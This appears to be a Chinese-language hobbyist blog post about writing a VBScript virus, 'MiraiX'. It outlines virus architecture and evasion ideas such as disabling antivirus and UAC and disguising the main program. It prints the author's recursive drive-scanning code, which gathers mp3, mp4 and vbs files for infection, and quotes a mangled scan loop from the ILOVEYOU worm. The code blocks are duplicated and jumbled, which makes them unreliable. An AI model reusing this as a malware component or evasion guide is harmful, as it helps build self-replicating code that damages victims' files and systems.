照慣例,先推薦一首歌給諸君。
總之,
在上次跟各位分享的具感染性的VBscript後,
我便繼續擴充MiraiX的其他功能,
包含了一些用於掃描硬碟與檔案的自函數,
試圖親自完成一個"具完整架構"的惡意程式。
哎呀,結~果~呢~
我發現這一切出乎意料之外的困難的說~OwO
原先我以為,
既然我能寫出病毒部分的關鍵程式碼,
那麼將各種功能組裝起來,
肯定難不到哪裡去,
對吧? 那肯定是如此,對吧?
但~是~呢~ 我發現組裝才是真正的難處所在。
該如何正確地組裝,分段執行各項功能,
才能有效的規避防毒軟體(AV)的掃瞄?
又該如何偽裝或掩護惡意軟體的主程式,
能夠讓使用者在不經意之間執行到病毒?
以上這一切關鍵技術,
都是在組裝病毒時我所遇到的瓶頸。
之後我去查了很多資料,
以研究電腦病毒所需具備的架構與相關概念。
首先,病毒可以在架構上分成兩塊主體:
1. search routine (檔案掃描的週期與設計)
2. self-replication (自我複製與檔案感染)
Search routine 的搜尋演算法與完整性,
會影響到self-replication感染的檔案數量,
與病毒所能感染的層面,速度以及深度。
其中,self-replication的程式碼愈是精簡,
被AV檢測出的機率則越低,
但同時也會被限制於只能感染單一類型的檔案,
使得感染的層面受限。
而 self-replication 通常會附帶反偵測的機制,
包含關閉/攻擊防毒軟體、關閉UAC、偽裝。
真的是超酷的的說,
辣ㄍ完整性,簡直就像一隻小生物一樣。
至於其餘的細節,請參考虛鹿的筆記:
這邊就當作是附錄
順便跟各位分享一下MiraiX掃描檔案的設計,
讓對病毒開發有興趣的ㄉ巴友能夠參考看看。
[#]MiraiX掃描檔案程式碼節錄:
Rem MiraiX Ver0.1.0(VBScript Ver.)
Rem Coded by Falsedeer(虛鹿) in 2022/1/27
'On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
Rem Coded by Falsedeer(虛鹿) in 2022/1/27
'On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
'target file-ext for infection 目標的感染檔案
Dim tgt_ext:tgt_ext = Array("mp3","mp4","vbs")
Dim runway:runway = Array()'holding valid file with certain ext 用來裝目標檔案的陣列
Dim tgt_ext:tgt_ext = Array("mp3","mp4","vbs")
Dim runway:runway = Array()'holding valid file with certain ext 用來裝目標檔案的陣列
Function AddItem(arr,val)'handle array additem 處理陣列加入新的物件
ReDim Preserve arr(UBound(arr)+1)
arr(UBound(arr)) = val
AddItem = arr
End Function
Function scandisk(path)'scanning all files/folders under certain path,looking for certain file-ext 掃苗主程式
For Each file In scanfile(path)'file
Dim ext
ext = fso.GetExtensionName(file)
ext = LCase(ext)
For Each y In tgt_ext
If StrComp(ext,y,1) = 0 Then
runway = AddItem(runway,file)
EndIf
Next
Next
For Each folder In scanfolder(path)'folder
scandisk(folder)
Next
End Function
Function scanfile(folder_)'scan files of selected path, return array 掃描檔案回傳陣列
Dim file:file = Array()'create array for files 裝回傳的檔案的陣列
Set fhandler = fso.GetFolder(folder_)
Set files = fhandler.Files
For Each file_ In files
file = AddItem(file,file_)
Next
scanfile =file
End Function
Function scanfolder(folder_)'scan subfolders of selected path, return array 掃描子資料夾
Dim folder:folder = Array()'create array for folders 裝回傳子資料夾的陣列
Set fhandler = fso.GetFolder(folder_)
Set folders = fhandler.SubFolders
For Each folder_ in folders
folder = AddItem(folder,folder_)
Next
scanfolder = folder
End Function
ReDim Preserve arr(UBound(arr)+1)
arr(UBound(arr)) = val
AddItem = arr
End Function
Function scandisk(path)'scanning all files/folders under certain path,looking for certain file-ext 掃苗主程式
For Each file In scanfile(path)'file
Dim ext
ext = fso.GetExtensionName(file)
ext = LCase(ext)
For Each y In tgt_ext
If StrComp(ext,y,1) = 0 Then
runway = AddItem(runway,file)
EndIf
Next
Next
For Each folder In scanfolder(path)'folder
scandisk(folder)
Next
End Function
Function scanfile(folder_)'scan files of selected path, return array 掃描檔案回傳陣列
Dim file:file = Array()'create array for files 裝回傳的檔案的陣列
Set fhandler = fso.GetFolder(folder_)
Set files = fhandler.Files
For Each file_ In files
file = AddItem(file,file_)
Next
scanfile =file
End Function
Function scanfolder(folder_)'scan subfolders of selected path, return array 掃描子資料夾
Dim folder:folder = Array()'create array for folders 裝回傳子資料夾的陣列
Set fhandler = fso.GetFolder(folder_)
Set folders = fhandler.SubFolders
For Each folder_ in folders
folder = AddItem(folder,folder_)
Next
scanfolder = folder
End Function
如過想要掃描特定的磁碟,
就能夠用 call scandisk("C:\") ,
把欲感染的目標檔案裝入runway()陣列之中。
我原本的想法是想把各個功能模組化,
以便程式未來的利用與改寫。
UMU!!
接著,讓我們來看看著名的愛蟲(VBS病毒),
掃描檔案所用的程式碼。
[#]愛蟲的程式碼節錄:
Set fso = CreateObject(”Scripting.FileSystemObject")
sub scan(folder_)
On Error Resume Next
set folder_ = fso.getfolder(folder_)
set files = folder_.files
for each file in files
On Error Resume Next
set folder_ = fso.getfolder(folder_)
set files = folder_.files
for each file in files
ext = fso.GetExtensionName(file)
ext = lcase(ext)
if ext = ”mp5″ then
‘~感染檔案的程式碼~
end if
next
set subfolders = folder_.subfolders
for each subfolder in subfolders
scan()
scan(subfolder)
next
end sub
ext = lcase(ext)
if ext = ”mp5″ then
‘~感染檔案的程式碼~
end if
next
set subfolders = folder_.subfolders
for each subfolder in subfolders
scan()
scan(subfolder)
next
end sub
哭啊,∑(゚Д゚)
還真的是簡潔有力的說……
難道這就是所謂的實力上的差距ㄇ? QAQ